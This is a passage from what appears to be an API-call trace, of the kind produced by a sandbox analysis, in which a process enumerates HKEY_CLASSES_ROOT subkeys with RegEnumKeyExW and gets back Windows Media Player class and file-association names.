lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.AudioCD", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x111f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.BurnCD", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1120, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.Device", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1121, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.Device.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1122, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.DVD", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1123, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.DVR-MSFile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1124, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.PlayCD", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1125, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.PlayMedia", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1126, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.VCD", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1127, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.WMDBFile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1128, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP.WTVFile", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1129, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.3G2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x112a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.3GP", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x112b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.ADTS", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x112c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.AIFF", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x112d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.ASF", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x112e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.ASX", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x112f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.AU", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1130, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.AVI", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1131, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.CDA", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1132, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.FLAC", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1133, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.M2TS", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1134, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.m3u", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1135, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.M4A", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1136, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.MIDI", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1137, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.MK3D", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.603] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1138, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.MKA", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.604] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1139, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.MKV", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.604] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x113a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.MOV", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x113b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.MP3", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x113c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.MP4", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x113d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.MPEG", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x113e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.TTS", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x113f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WAV", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1140, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WAX", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1141, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WMA", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1142, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WMD", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1143, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WMS", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1144, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WMV", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1145, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WMZ", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1146, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WPL", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1147, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocFile.WVX", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1148, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.3G2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1149, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.3GP", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x114a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.ADTS", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x114b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.AIFF", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x114c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.ASF", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x114d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.ASX", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.605] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x114e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.AU", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x114f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.AVI", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1150, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.FLAC", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1151, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.M2TS", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1152, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.M3U", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1153, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.M4A", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1154, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.MIDI", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1155, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.MK3D", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1156, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.MKA", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1157, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.MKV", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1158, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.MOV", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1159, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.MP3", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x115a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.MP4", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x115b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.MPEG", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x115c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.TTS", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x115d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.WAV", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x115e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.WAX", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x115f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.WMA", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1160, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.WMD", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1161, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.WMV", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.606] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1162, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.WMZ", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1163, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.WPL", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1164, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocMIME.WVX", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1165, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocProtocol.DLNA-PLAYSINGLE", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1166, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMP11.AssocProtocol.MMS", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1167, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMPlayer.OCX", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1168, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMPlayer.OCX.7", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1169, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMPNSSCI.NSSManager", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x116a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMPNSSCI.NSSManager.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x116b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMPTheme.WMPSkinMngr", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x116c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMPTheme.WMPSkinMngr.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x116d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMSClientNetManager.ClientNetManager", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.607] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x116e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: 